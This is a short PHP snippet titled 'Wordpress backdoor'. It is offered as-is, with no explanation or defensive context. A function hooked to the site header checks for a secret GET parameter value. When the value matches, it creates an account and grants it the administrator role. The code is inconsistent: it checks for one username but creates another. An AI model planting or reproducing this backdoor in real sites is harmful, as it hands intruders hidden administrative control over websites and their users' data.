Wordpress backdoor
add_action( 'wp_head', 'my_back' );
function my_back() {
if ( $_GET['back'] == '*23enter23*' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'buxadmin' ) ) {
$user_id = wp_create_user( 'hackmin', '*23enter23*' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
?>